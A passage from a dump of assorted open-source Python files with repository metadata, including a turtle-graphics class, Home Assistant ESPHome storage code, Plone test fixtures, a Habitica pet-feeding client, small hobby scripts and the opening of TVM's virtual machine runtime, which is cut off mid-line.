SimpleTurtle draw a circle with the given radius. Example (assuming sally is an rg.SimpleTurtle): sally.draw_circle(40) """ self._update_real_turtle() self._turtle.circle(radius) def draw_square(self, length_of_sides): """ Makes this SimpleTurtle draw a square with the given value for the length of each of its sides. Example (assuming sally is an rg.SimpleTurtle): sally.draw_square(100) """ for _ in range(4): self.forward(length_of_sides) self.left(90) def draw_regular_polygon(self, number_of_sides, length_of_sides): """ Makes this SimpleTurtle draw a regular polygon with the given number of sides and the given length for each of its sides. Example (assuming sally is an rg.SimpleTurtle): sally.draw_polygon(8, 75) # octogon sally.draw_polygon(3, 75) # triangle """ for _ in range(number_of_sides): self.forward(length_of_sides) self.left(360 / number_of_sides) def pen_up(self): """ Lifts up this SimpleTurtle's pen. Subsequent movements will NOT draw a line (until pen_down is called). Example (assuming sally is an rg.SimpleTurtle): sally.pen_up() """ self._update_real_turtle() self._turtle.penup() def pen_down(self): """ Puts down this SimpleTurtle's pen. Subsequent movements WILL draw a line using this SimpleTurtle's pen (until pen_up is called). Example (assuming sally is an rg.SimpleTurtle): sally.pen_down() """ self._update_real_turtle() self._turtle.pendown() def x_cor(self): """ Returns the x-coordinate of this SimpleTurtle's current position. Example (assuming sally is an rg.SimpleTurtle): x = sally.x_cor() """ return self._turtle.xcor() def y_cor(self): """ Returns the y-coordinate of this SimpleTurtle's current position. Example (assuming sally is an rg.SimpleTurtle): y = sally.y_cor() """ return self._turtle.ycor() def begin_fill(self): """ Begins "filling" the shape that this SimpleTurtle draws, using this SimpleTurtle's paint_bucket as the fill. Example (assuming sally is an rg.SimpleTurtle) that fills a triangle with green: sally.paint_bucket = rg.PaintBucket('green') sally.begin_fill() sally.forward(100) sally.left(120) sally.forward(100) sally.left(120) sally.forward(100) sally.end_fill() """ self._update_real_turtle() self._turtle.begin_fill() def end_fill(self): """ Completes "filling" the shape that this SimpleTurtle draws, using this SimpleTurtle's paint_bucket as the fill. Example (assuming sally is an rg.SimpleTurtle) that fills a triangle with green: sally.paint_bucket = rg.PaintBucket('green') sally.begin_fill() sally.forward(100) sally.left(120) sally.forward(100) sally.left(120) sally.forward(100) sally.end_fill() """ self._update_real_turtle() self._turtle.end_fill() def clear(self): """ Not yet implemented. """ def clone(self): """ Not yet implemented. """ pass def write_text(self): """ Not yet implemented. """ pass def _update_real_turtle(self): self._turtle.pencolor(self.pen.color) self._turtle.pensize(self.pen.thickness) self._turtle.fillcolor(self.paint_bucket.color) self._turtle.speed(self.speed) class Pen(object): """ A Pen has a color and thickness. SimpleTurtles use a Pen for drawing lines. To construct a Pen, use: rg.Pen(color, thickness) where color is a color (e.g. 'red') and thickness is a small positive integer. Instance variables are: color: The color of the Pen thickness: The thickness of the Pen Examples: thick_blue = rg.Pen('blue', 14) thin_red = rg.Pen('red', 1) """ def __init__(self, color, thickness): self.thickness = thickness self.color = color class PaintBucket(object): """ A PaintBucket has a color. SimpleTurtles use a PaintBucket for filling shapes with color. To construct a PaintBucket, use: rg.PaintBucket(color) where color is a color (e.g. 'red'). Instance variables are: color: The color of the PaintBucket Example: paint = rg.PaintBucket('green') """ def __init__(self, color): self.color = color
482928edaa2e06cd3b7bed4f4eaec7daf1bdda60
2c74bb301f1ed83b79254944183ac5a18a639fdf
/homeassistant/components/esphome/domain_data.py
01f0a4d6b1369b6f6908d943c821bb3805e59e57
[ "Apache-2.0" ]
permissive
Adminiuga/home-assistant
5bec93007ddac1a268cc359bf7e48530c5f73b38
dcf68d768e4f628d038f1fdd6e40bad713fbc222
refs/heads/dev
2023-02-22T22:03:31.013931
2022-11-09T00:27:20
2022-11-09T00:27:20
123,929,062
5
4
Apache-2.0
2023-02-22T06:14:31
2018-03-05T14:11:09
Python
UTF-8
Python
false
false
2,885
py
"""Support for esphome domain data.""" from __future__ import annotations from dataclasses import dataclass, field from typing import TypeVar, cast from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant from homeassistant.helpers.json import JSONEncoder from homeassistant.helpers.storage import Store from .entry_data import RuntimeEntryData STORAGE_VERSION = 1 DOMAIN = "esphome" _DomainDataSelfT = TypeVar("_DomainDataSelfT", bound="DomainData") @dataclass class DomainData: """Define a class that stores global esphome data in hass.data[DOMAIN].""" _entry_datas: dict[str, RuntimeEntryData] = field(default_factory=dict) _stores: dict[str, Store] = field(default_factory=dict) _entry_by_unique_id: dict[str, ConfigEntry] = field(default_factory=dict) def get_by_unique_id(self, unique_id: str) -> ConfigEntry: """Get the config entry by its unique ID.""" return self._entry_by_unique_id[unique_id] def get_entry_data(self, entry: ConfigEntry) -> RuntimeEntryData: """Return the runtime entry data associated with this config entry. Raises KeyError if the entry isn't loaded yet. """ return self._entry_datas[entry.entry_id] def set_entry_data(self, entry: ConfigEntry, entry_data: RuntimeEntryData) -> None: """Set the runtime entry data associated with this config entry.""" if entry.entry_id in self._entry_datas: raise ValueError("Entry data for this entry is already set") self._entry_datas[entry.entry_id] = entry_data if entry.unique_id: self._entry_by_unique_id[entry.unique_id] = entry def pop_entry_data(self, entry: ConfigEntry) -> RuntimeEntryData: """Pop the runtime entry data instance associated with this config entry.""" if entry.unique_id: del self._entry_by_unique_id[entry.unique_id] return self._entry_datas.pop(entry.entry_id) def is_entry_loaded(self, entry: ConfigEntry) -> bool: """Check whether the given entry is loaded.""" return entry.entry_id in self._entry_datas def get_or_create_store(self, hass: HomeAssistant, entry: ConfigEntry) -> Store: """Get or create a Store instance for the given config entry.""" return self._stores.setdefault( entry.entry_id, Store( hass, STORAGE_VERSION, f"esphome.{entry.entry_id}", encoder=JSONEncoder ), ) @classmethod def get(cls: type[_DomainDataSelfT], hass: HomeAssistant) -> _DomainDataSelfT: """Get the global DomainData instance stored in hass.data.""" # Don't use setdefault - this is a hot code path if DOMAIN in hass.data: return cast(_DomainDataSelfT, hass.data[DOMAIN]) ret = hass.data[DOMAIN] = cls() return ret
5a1ed0cd70c637628613bcdc2591471ce0eebf24
b3c8678c1db0b3e256de97e560d7d4d26c1dd6eb
/src/jpl.mcl.site.sciencedata/src/jpl/mcl/site/sciencedata/testing.py
4325448b2a43549da50926c2e47a4028a8f43d2d
[ "GPL-2.0-only", "Apache-2.0", "GPL-1.0-or-later" ]
permissive
MCLConsortium/mcl-site
e4a127235504e7ac5575ef3d73c8fd1bdf02824b
5eb9c16a7fe322192a03461a9f22ecb8c17307fd
refs/heads/master
2021-06-09T23:49:35.775652
2021-04-30T22:59:59
2021-04-30T22:59:59
49,965,919
1
0
Apache-2.0
2020-08-25T15:58:27
2016-01-19T16:24:58
Python
UTF-8
Python
false
false
1,896
py
# encoding: utf-8 from plone.app.testing import PloneSandboxLayer, IntegrationTesting, FunctionalTesting, PLONE_FIXTURE from . import PACKAGE_NAME import pkg_resources, urllib2, urllib, httplib, plone.api class TestSchemeHandler(urllib2.BaseHandler): u'''A special URL handler for the testing-only scheme ``testscheme``.''' def testscheme_open(self, req): try: selector = req.get_selector() path = 'tests/data/' + selector.split('/')[-1] + '.json' if pkg_resources.resource_exists(PACKAGE_NAME, path): return urllib.addinfourl( pkg_resources.resource_stream(PACKAGE_NAME, path), httplib.HTTPMessage(open('/dev/null')), req.get_full_url(), 200 ) else: raise urllib2.URLError('Not found') except Exception: raise urllib2.URLError('Not found') class JPLMCLSiteSciencedataLayer(PloneSandboxLayer): defaultBases = (PLONE_FIXTURE,) def setUpZope(self, app, configurationContext): import jpl.mcl.site.sciencedata self.loadZCML(package=jpl.mcl.site.sciencedata) urllib2.install_opener(urllib2.build_opener(TestSchemeHandler)) def setUpPloneSite(self, portal): wfTool = plone.api.portal.get_tool('portal_workflow') wfTool.setDefaultChain('plone_workflow') self.applyProfile(portal, 'jpl.mcl.site.sciencedata:default') JPL_MCL_SITE_SCIENCEDATA_FIXTURE = JPLMCLSiteSciencedataLayer() JPL_MCL_SITE_SCIENCEDATA_INTEGRATION_TESTING = IntegrationTesting( bases=(JPL_MCL_SITE_SCIENCEDATA_FIXTURE,), name='JPLMCLSiteSciencedataLayer:IntegrationTesting' ) JPL_MCL_SITE_SCIENCEDATA_FUNCTIONAL_TESTING = FunctionalTesting( bases=(JPL_MCL_SITE_SCIENCEDATA_FIXTURE,), name='JPLMCLSiteSciencedataLayer:FunctionalTesting' )
d555da4df0ff92fad94428138c04e5725366861c
47542e6b98c19592f44ce44297771c698d4987f7
/ch09/09_08.py
42a496a958555522889a656ddd4e96b4f567131b
[ "Apache-2.0" ]
permissive
sharebook-kr/book-cryptocurrency
235b6998668265ec804451afddd245a52824f51a
847ba97ba096c257b35f5e507cd33fa6a0724860
refs/heads/master
2022-12-14T05:24:52.765589
2022-11-30T01:35:08
2022-11-30T01:35:08
128,632,349
162
141
Apache-2.0
2022-11-30T01:35:09
2018-04-08T11:05:17
Python
UTF-8
Python
false
false
301
py
import websockets import asyncio async def bithumb_ws_client(): uri = "wss://pubwss.bithumb.com/pub/ws" async with websockets.connect(uri) as websocket: greeting = await websocket.recv() print(greeting) async def main(): await bithumb_ws_client() asyncio.run(main())
9a4b55c49ddbd6bf15ee9f95c0e49e1c0aa461d2
0c7e54178e89a4dad98deb8265c2cb41ca3399b9
/backend/strawberry_forms/tests/test_mutations.py
470971ab95ea4f9bf7f8c47ae52ac75af4feafda
[ "MIT" ]
permissive
marlenebDC/pycon
4394bf7a0aecc5aa8ae0b378900d86c2afc7fab7
175f2ee9e8698bbcf15dd33d2eb4739fee04c6d7
refs/heads/master
2023-07-07T00:34:39.932779
2020-01-21T01:00:24
2020-01-21T01:00:24
235,290,754
0
0
MIT
2023-06-23T23:35:11
2020-01-21T08:30:15
null
UTF-8
Python
false
false
1,670
py
import strawberry from django.forms import Form, IntegerField from strawberry_forms.mutations import FormMutation def test_form_mutation_without_context(): class TestForm(Form): a = IntegerField() def save(self, *args, **kwargs): return "hello" class TestMutation(FormMutation): class Meta: form_class = TestForm @strawberry.input class TestInput: a: int assert TestMutation.Mutation(None, TestInput(a=1)) == "hello" def test_form_mutation_response_can_be_converted_using_transform_method(): class TestForm(Form): a = IntegerField() def save(self, *args, **kwargs): return "hello" class TestMutation(FormMutation): @classmethod def transform(cls, result): return "world" class Meta: form_class = TestForm @strawberry.input class TestInput: a: int assert TestMutation.Mutation(None, TestInput(a=1)) == "world" def test_form_mutation_transform_is_not_required(): class TestForm(Form): a = IntegerField() def save(self, *args, **kwargs): return "hello" class TestMutation(FormMutation): class Meta: form_class = TestForm @strawberry.input class TestInput: a: int assert TestMutation.Mutation(None, TestInput(a=1)) == "hello" def test_mutation_without_input(): class TestForm(Form): def save(self, *args, **kwargs): return "ciao" class TestMutation(FormMutation): class Meta: form_class = TestForm assert TestMutation.Mutation(None) == "ciao"
225c14407e2eba431953f219ed8ecc4582a965c5
8b54570140861ffbe464e244f9f49ba55e341577
/linux/ovirt-guest-tray.py
cdc740419735bb0eb6c99bfa8f3a70c09adf3c55
[ "Apache-2.0" ]
permissive
vinzenz/ovirt-guest-agent-tray
36569d149b7082e8129fbe5c462869bfeb8bf779
581a73f3ff4431a6a17f6ff9bc3d64f2b23ff586
refs/heads/master
2016-09-06T07:41:07.988384
2014-07-30T13:55:46
2014-07-30T13:57:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,422
py
#!/usr/bin/env python import gtk class TrayIcon: def __init__(self, *args, **kwargs): self.icon = gtk.StatusIcon() self.icon.set_from_file('ovirt-icon-48.svg') self.icon.connect('popup-menu', self.on_popup_menu) def on_about(self, *args, **kwargs): dlg = gtk.Dialog("About the oVirt Guest Agent", None, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT, (gtk.STOCK_OK, gtk.RESPONSE_ACCEPT)) label1 = gtk.Label("oVirt Guest Agent for Linux") label1.show() label2 = gtk.Label("Version 3.6.0") label2.show() label3 = gtk.Label("oVirt Guest Agent is running.") label3.show() sw = gtk.ScrolledWindow() sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) sw.set_shadow_type(gtk.SHADOW_ETCHED_IN) textview = gtk.TextView() textview.set_editable(False) textview.set_cursor_visible(False) textview.set_sensitive(False) sw.add(textview) buffer = textview.get_buffer() lic = '<Copyright information here>' try: f = open('/usr/share/ovirt-guest-agent/COPYING', 'r') lic = f.read() f.close() except (OSError,IOError): pass buffer.insert(buffer.get_end_iter(), lic) textview.show() sw.show() dlg.vbox.set_homogeneous(False) dlg.vbox.pack_start(label1, fill=False, expand=False, padding=4) dlg.vbox.pack_start(label2, fill=False, expand=False, padding=4) dlg.vbox.pack_start(sw, fill=True, expand=True, padding=4) dlg.vbox.pack_start(label3, fill=False, expand=False, padding=4) dlg.set_default_size(640, 480) dlg.run() dlg.destroy() def on_popup_menu(self, icon, event_button, event_time): menu = gtk.Menu() about = gtk.MenuItem('About') about.show() about.connect('activate', self.on_about) menu.append(about) sep = gtk.SeparatorMenuItem() sep.show() menu.append(sep) quit = gtk.MenuItem('Quit') quit.show() menu.append(quit) quit.connect('activate', gtk.main_quit) menu.popup(None, None, gtk.status_icon_position_menu, event_button, event_time, self.icon) if __name__ == '__main__': icon = TrayIcon() gtk.main()
d5cab9a4b1e7e1be3cf13dddebae13f6a4066b74
1d9a6406c859fda186f520bb4472c551fc572c7b
/src/hopla/hoplalib/zoo/petcontroller.py
b5f9e7d0243348d6b233bab73bbf200a2f76e11e
[ "Apache-2.0" ]
permissive
rickie/hopla
af21b794ce6719d402721550e1ee4091790410b6
24a422194e42c03d5877dc167b2b07147326a595
refs/heads/main
2023-08-13T17:33:03.612293
2021-10-12T12:13:25
2021-10-12T12:13:25
408,538,704
0
0
Apache-2.0
2021-09-20T17:30:15
2021-09-20T17:30:15
null
UTF-8
Python
false
false
2,211
py
""" A module for performing feeding Pet HTTP requests. """ from typing import NoReturn, Optional, Union import requests from hopla.hoplalib.http import HabiticaRequest, UrlBuilder from hopla.hoplalib.zoo.feed_clickhelper import get_feed_data_or_exit from hopla.hoplalib.zoo.zoofeed_algorithms import FeedPlanItem class FeedPostRequester(HabiticaRequest): """ The FeedPostRequester sends a post request to feed a pet. Note: this API endpoint expects query params instead of a request body (even though it is a HTTP POST). [APIDOCS](https://habitica.com/apidoc/#api-User-UserFeed) """ _DEFAULT_FOOD_AMOUNT = 1 def __init__(self, *, pet_name: str, food_name: str, food_amount: Optional[int] = _DEFAULT_FOOD_AMOUNT): self.pet_name = pet_name self.food_name = food_name self.query_params = { "amount": food_amount or FeedPostRequester._DEFAULT_FOOD_AMOUNT } @property def path(self) -> str: """Return the URL used to feed a pet""" return f"/user/feed/{self.pet_name}/{self.food_name}" @property def feed_pet_food_url(self) -> str: """Return the url to feed a pet""" return UrlBuilder(path_extension=self.path).url def post_feed_request(self) -> requests.Response: """Performs the feed pet post requests and return the response""" return requests.post(url=self.feed_pet_food_url, headers=self.default_headers, params=self.query_params) def post_feed_request_get_data_or_exit(self) -> Union[NoReturn, dict]: """ Performs the feed pet post requests and return the feed response if successful. Else exit :return: """ response: requests.Response = self.post_feed_request() return get_feed_data_or_exit(response) @classmethod def build_from(cls, feed_item: FeedPlanItem) -> "FeedPostRequester": """Create a request from a feed plan item.""" return FeedPostRequester( pet_name=feed_item.pet_name, food_name=feed_item.food_name, food_amount=feed_item.times )
e1461c6411425ee974d36267c209f92b7be55c59
f6188c0c27da8d2507e832908ba9de524f0b907d
/client_speed_test.py
b23314ac7daa63ea09593b18003d1800d1583546
[]
no_license
lforet/repfibdigit
df1df2fe2ba40ede9662120ea94f7d529f5d4abc
945ce755fd2526a1a3e242b909b93a79ac4e65fb
refs/heads/master
2021-01-10T08:43:11.123781
2018-12-21T05:32:45
2018-12-21T05:32:45
8,490,162
0
0
null
null
null
null
UTF-8
Python
false
false
1,997
py
#!/usr/bin/python # This is client.py file #System modules import os import time import itertools import cPickle as pickle import numpy as np #import cProfile import timeit import uuid import sys import fib ######################################################################## pgbreak = "-----------------------------------------------" #---------------------------------------------------------------------- def is_repfibdigit( number_to_test): n = map(int,str(number_to_test)) while number_to_test > n[0]: n=n[1:]+[sum(n)] if (number_to_test == n[0]) & (number_to_test>9): show_proof(number_to_test) #raw_input() #time.sleep(1) #else: # print number_to_test, " is NOT a Keith Number" return def is_repfibdigit2( number_to_test): if fib.is_repfibdigit(number_to_test) == True: show_proof(number_to_test) #raw_input() #time.sleep(1) #else: # print number_to_test, " is NOT a Keith Number" return #this function is to get around the 32bit native int barrier #not needed in 64 native systems def my_xrange( start, stop, step): i = start while i < stop: yield i i += step def show_proof(kn): print '---------------------------------------------' #print 'queue:', threading.current_thread() print kn, " is a Keith Number!" print "PROOF:" n=map(int,str(kn)) while kn > sum(n): print n ," = ", sum(n) n=n[1:]+[sum(n)] print n ," = ", sum(n) #self.report_keith_num(number_to_test) #print "new keith number reported!!!!" print '---------------------------------------------' print "press ENTER to continue" ######################################################################## if __name__=="__main__": if len(sys.argv) > 1: end_num = sys.argv[1] nowtime = time.clock() # get num to work from start_num = 0 print "Starting number:", start_num for x in xrange(start_num, int(end_num)): is_repfibdigit2(x) print print "completion time:", abs(nowtime - time.clock()) print pgbreak #raw_input()
00db2c8c3ed972b7163d98736f55e12ede747a2c
50008b3b7fb7e14f793e92f5b27bf302112a3cb4
/recipes/Python/577538_Poor_Man_unit_tests/recipe-577538.py
a085b12780b5428ff89dbdb43e8d9d754e602175
[ "MIT" ]
permissive
betty29/code-1
db56807e19ac9cfe711b41d475a322c168cfdca6
d097ca0ad6a6aee2180d32dce6a3322621f655fd
refs/heads/master
2023-03-14T08:15:47.492844
2021-02-24T15:39:59
2021-02-24T15:39:59
341,878,663
0
0
MIT
2021-02-24T15:40:00
2021-02-24T11:31:15
Python
UTF-8
Python
false
false
3,834
py
#! /usr/bin/env python ###################################################################### # Written by Kevin L. Sitze on 2010-12-03 # This code may be used pursuant to the MIT License. ###################################################################### import sys import traceback from types import FloatType, ComplexType __all__ = ( 'assertEquals', 'assertNotEquals', 'assertException', 'assertFalse', 'assertNone', 'assertNotNone', 'assertSame', 'assertNotSame', 'assertTrue' ) def colon( msg ): if msg: return ": " + str( msg ) else: return "" def assertEquals( exp, got, msg = None ): """assertEquals( exp, got[, message] ) Two objects test as "equal" if: * they are the same object as tested by the 'is' operator. * either object is a float or complex number and the absolute value of the difference between the two is less than 1e-8. * applying the equals operator ('==') returns True. """ if exp is got: r = True elif ( type( exp ) in ( FloatType, ComplexType ) or type( got ) in ( FloatType, ComplexType ) ): r = abs( exp - got ) < 1e-8 else: r = ( exp == got ) if not r: print >>sys.stderr, "Error: expected <%s> but got <%s>%s" % ( repr( exp ), repr( got ), colon( msg ) ) traceback.print_stack() def assertNotEquals( exp, got, msg = None ): """assertNotEquals( exp, got[, message] ) Two objects test as "equal" if: * they are the same object as tested by the 'is' operator. * either object is a float or complex number and the absolute value of the difference between the two is less than 1e-8. * applying the equals operator ('==') returns True. """ if exp is got: r = False elif ( type( exp ) in ( FloatType, ComplexType ) or type( got ) in ( FloatType, ComplexType ) ): r = abs( exp - got ) >= 1e-8 else: r = ( exp != got ) if not r: print >>sys.stderr, "Error: expected different values but both are equal to <%s>%s" % ( repr( exp ), colon( msg ) ) traceback.print_stack() def assertException( exceptionType, f, msg = None ): """Assert that an exception of type \var{exceptionType} is thrown when the function \var{f} is evaluated. """ try: f() except exceptionType: assert True else: print >>sys.stderr, "Error: expected <%s> to be thrown by function%s" % ( exceptionType.__name__, colon( msg ) ) traceback.print_stack() def assertFalse( b, msg = None ): """assertFalse( b[, message] ) """ if b: print >>sys.stderr, "Error: expected value to be False%s" % colon( msg ) traceback.print_stack() def assertNone( x, msg = None ): assertSame( None, x, msg ) def assertNotNone( x, msg = None ): assertNotSame( None, x, msg ) def assertSame( exp, got, msg = None ): if got is not exp: print >>sys.stderr, "Error: expected <%s> to be the same object as <%s>%s" % ( repr( exp ), repr( got ), colon( msg ) ) traceback.print_stack() def assertNotSame( exp, got, msg = None ): if got is exp: print >>sys.stderr, "Error: expected two distinct objects but both are the same object <%s>%s" % ( repr( exp ), colon( msg ) ) traceback.print_stack() def assertTrue( b, msg = None ): if not b: print >>sys.stderr, "Error: expected value to be True%s" % colon( msg ) traceback.print_stack() if __name__ == "__main__": assertNone( None ) assertEquals( 5, 5 ) assertException( KeyError, lambda: {}['test'] ) assertNone( 5, 'this assertion is expected' ) assertEquals( 5, 6, 'this assertion is expected' ) assertException( KeyError, lambda: {}, 'this assertion is expected' )
294780ff7ab60dc91677fc1d89295b77c146b850
4a53aba78d55247e185d8cef5e2a1f8892ae68be
/learn_python/08.jpype.py
13917ac8e31a1518b4553ebf02a516bd1b6ee5af
[]
no_license
axu4github/Learn
665bb8ddd2eb420a0e7bc3d1ff68f66958936645
2eb33b5a97f1730e3f774b80e3b206c49faa2228
refs/heads/master
2023-01-22T15:49:53.260777
2018-10-25T15:21:56
2018-10-25T15:21:56
61,703,577
1
0
null
2023-01-12T08:23:28
2016-06-22T08:46:46
JavaScript
UTF-8
Python
false
false
664
py
# encoding=utf-8 ''' Mac安装JPype 1. 下载 https://sourceforge.net/projects/jpype/ 最新版本 2. 解压,进入目录 3. 执行 sudo python setup.py install 若存在 `error: command 'clang' failed with exit status 1` 的问题 则需要在 setup.py 文件的 `self.includeDirs` 中添加 `"/System/Library/Frameworks/JavaVM.framework/Versions/A/Headers/"` 以便可以找到 `jni.h` 等头文件。 具体可详见:http://blog.csdn.net/jerrychenly/article/details/20545995 说明 ''' from jpype import * startJVM('/Library/Java/JavaVirtualMachines/jdk1.7.0_09.jdk/Contents/MacOS/libjli.dylib') java.lang.System.out.println("hello world") shutdownJVM()
8c817d375a6e4429ab2667c176887dbb4d65c7da
a499fbdd93f85a286505433a08afc25d84c8ff04
/python/tvm/runtime/vm.py
2be3f3ec1a78cdc5de989fd61d84de1855339132
[ "Apache-2.0", "Zlib", "MIT", "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference", "Unlicense" ]
permissive
elphinkuo/tvm
a81e0ccc5950a1473efdcdbb8263de9adbe36787
9df2ae8eaa8b394013182a7ad09ac57fe401f80e
refs/heads/main
2023-08-05T07:41:18.652097
2021-09-28T00:38:26
2021-09-28T00:38:26
411,311,927
2
0
Apache-2.0
2021-09-28T14:51:56
2021-09-28T14:17:46
null
UTF-8
Python
false
false
21,091
py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=no-else-return, unidiomatic-typecheck, undefined-variable, invalid-name, redefined-builtin """ The Relay Virtual Machine runtime. Implements a Python interface to executing the compiled VM object. """ import numpy as np import tvm from tvm.runtime import Module from tvm._ffi.runtime_ctypes import TVMByteArray from tvm._ffi import base as _base from .object import Object from . import _ffi_api, container from ..rpc.base import RPC_SESS_MASK def _convert(arg, cargs): if isinstance(arg, Object): cargs.append(arg) elif isinstance(arg, np.ndarray): nd_arr = tvm.nd.array(arg, device=tvm.cpu(0)) cargs.append(nd_arr) elif isinstance(arg, tvm.runtime.NDArray): cargs.append(arg) elif isinstance(arg, (tuple, list)): field_args = [] for field in arg: _convert(field, field_args) cargs.append(container.tuple_object(field_args)) elif isinstance(arg, (_base.numeric_types, bool)): dtype = "int32" if isinstance(arg, (_base.integer_types, bool)) else "float32" value = tvm.nd.array(np.array(arg, dtype=dtype), device=tvm.cpu(0)) cargs.append(value) elif isinstance(arg, str): cargs.append(arg) else: raise TypeError("Unsupported type: %s" % (type(arg))) def convert(args): cargs = [] for arg in args: _convert(arg, cargs) return cargs class Executable(object): """Relay VM executable""" def __init__(self, mod): self.mod = mod self._function_params = {} self._save = self.mod["save"] self._get_lib = self.mod["get_lib"] self._get_bytecode = self.mod["get_bytecode"] self._get_stats = self.mod["get_stats"] self._get_function_arity = self.mod["get_function_arity"] self._get_function_param_name = self.mod["get_function_param_name"] def save(self): """Save the Relay VM Executable. Returns ------- code : bytearray The binary blob representing a serialized Relay VM executable. It can then be saved to disk and later deserialized into a new Executable. lib : :py:class:`~tvm.runtime.Module` The runtime module that contains the generated code. It is basically a library that is composed of hardware dependent code. Notes ----- The returned code is organized with the following sections in order. - Global section. This section contains the globals used by the virtual machine. - Constant section. This section is used to store the constant pool of a virtual machine. - Primitive name section. This section is introduced to accommodate the list of primitive operator names that will be invoked by the virtual machine. - Code section. The VM functions, including bytecode, are sitting in this section. Examples -------- .. code-block:: python import numpy as np import tvm from tvm import te from tvm import relay # define a simple network. x = relay.var('x', shape=(10, 10)) f = relay.Function([x], x + x) mod = tvm.IRModule({"main": f}) # create a Relay VM. dev = tvm.cpu() target = "llvm" executable = relay.vm.compile(mod, target) code, lib = executable.save() # save and load the code and lib file. tmp = tvm.contrib.utils.tempdir() path_lib = tmp.relpath("lib.so") lib.export_library(path_lib) with open(tmp.relpath("code.ro"), "wb") as fo: fo.write(code) loaded_lib = tvm.runtime.load_module(path_lib) loaded_code = bytearray(open(tmp.relpath("code.ro"), "rb").read()) # deserialize. des_exec = tvm.runtime.vm.Executable.load_exec(loaded_code, loaded_lib) # execute the deserialized executable. x_data = np.random.rand(10, 10).astype('float32') des_vm = tvm.runtime.vm.VirtualMachine(des_exec, dev) res = des_vm.run(x_data) print(res.numpy()) """ return self._save(), self._get_lib() @staticmethod def load_exec(bytecode, lib): """Construct an executable from saved artifacts. Parameters ---------- bytecode : bytearray The binary blob representing a the Relay VM bytecode. lib : :py:class:`~tvm.runtime.Module` The runtime module that contains the generated code. Returns ------- exec: Executable An executable constructed using the provided artifacts. """ if isinstance(bytecode, (bytes, str)): code = bytearray(bytecode) elif not isinstance(bytecode, (bytearray, TVMByteArray)): raise TypeError( "bytecode is expected to be the type of bytearray " + "or TVMByteArray, but received {}".format(type(code)) ) if lib is not None and not isinstance(lib, tvm.runtime.Module): raise TypeError( "lib is expected to be the type of tvm.runtime.Module" + ", but received {}".format(type(lib)) ) return Executable(_ffi_api.Load_Executable(bytecode, lib)) @property def lib(self): """Get the library that contains hardware dependent code. Returns ------- ret : :py:class:`~tvm.runtime.Module` The runtime module that contains hardware dependent code. """ return self._get_lib() @property def stats(self): """Get the statistics of the Relay VM executable. Returns ------- ret : String The statistic information of the VM executable. """ return self._get_stats() @property def primitive_ops(self): """Get the name of the primitive ops contained in the executable. Returns ------- ret : List[String] The list of primitive ops. """ ret = [] num_primitives = _ffi_api.GetNumOfPrimitives(self.module) for i in range(num_primitives): ret.append(_ffi_api.GetPrimitiveFields(self.module, i)) return ret @property def bytecode(self): """Get the bytecode of the Relay VM executable. Returns ------- ret : String The bytecode of the executable. Notes ----- The bytecode is in the following format: func_name reg_file_size num_instructions param1 param2 ... paramM instruction1 instruction2 ... instructionN Each instruction is printed in the following format: hash opcode field1 ... fieldX # The text format. The part starting from # is only used for visualization and debugging. The real serialized code doesn't contain it, therefore the deserializer doesn't need to deal with it as well. """ return self._get_bytecode() @property def globals(self): """Get the globals used by the Relay VM executable. Returns ------- ret : List[String] The globals contained in the executable. """ ret = [] num_globals = _ffi_api.GetNumOfGlobals(self.module) for i in range(num_globals): ret.append(_ffi_api.GetGlobalFields(self.module, i)) return ret @property def module(self): """Return the runtime module contained in a virtual machine executable.""" return self.mod def get_function_params(self, func_name): """Get VM Function parameters""" if func_name in self._function_params: return self._function_params[func_name] arity = self._get_function_arity(func_name) assert arity >= 0 params = [] for i in range(arity): p = self._get_function_param_name(func_name, i) assert p params.append(p) self._function_params[func_name] = params return params class VirtualMachine(object): """Relay VM runtime. Parameters ---------- exe : Executable The VM executable. device : tvm.runtime.Device or List[tvm.runtime.Device] The device to deploy the module memory_cfg : str or Dict[tvm.runtime.Device, str], optional Config the type of memory allocator. The allocator type can be ["naive", "pooled"]. If memory_cfg is None, all devices will use pooled allocator by default. If memory_cfg is string, all devices will use the specified allocator type. If memory_cfg is a dict, each device uses the allocator type specified in the dict, or pooled allocator if not specified in the dict. """ NAIVE_ALLOCATOR = 1 POOLED_ALLOCATOR = 2 def __init__(self, exe, device, memory_cfg=None): """ Construct a VirtualMachine wrapper class which provides a simple interface over the raw C++ Module based API. Parameters ---------- exe: Union[Executable, Module] The executable either with the wrapper Python type or the raw runtime.Module. In most cases this will be the Python wrapper class tvm.runtime.vm.Executable but if you instead get the underlying runtime.Module subclass (i.e `exe.mod`) you can directly pass it to this method. This case can occur when doing things such as RPC where TVM's module APIs return the raw modules, not the wrapped modules. This constructor will handle this internally. device: Union[Device, List[Device]] The device, or devices on which to execute the VM code. memory_cfg: Optional[str] The allocator behavior to use for the VM. Returns ------- vm: VirtualMachine A VM wrapper object. """ if not isinstance(exe, Executable) and not isinstance(exe, Module): raise TypeError( "exe is expected to be the type of Executable, " + "but received {}".format(type(exe)) ) if not isinstance(exe, Executable): exe = Executable(exe) self.module = exe.mod["vm_load_executable"]() self._exec = exe self._init = self.module["init"] self._invoke = self.module["invoke"] self._invoke_stateful = self.module["invoke_stateful"] self._get_output = self.module["get_output"] self._get_num_outputs = self.module["get_num_outputs"] self._get_input_index = self.module["get_input_index"] self._set_input = self.module["set_input"] self._setup_device(device, memory_cfg) def _setup_device(self, dev, memory_cfg): """Init devices and allocators.""" devs = dev if not isinstance(dev, (list, tuple)): if not isinstance(dev, tvm.runtime.Device): raise TypeError( "dev is expected to be Device or \ List[Device]" ) devs = [dev] # CPU is required for executing shape functions if not any(c.device_type % RPC_SESS_MASK == tvm.cpu().device_type for c in devs): devs.append(tvm.cpu()) default_alloc_type = 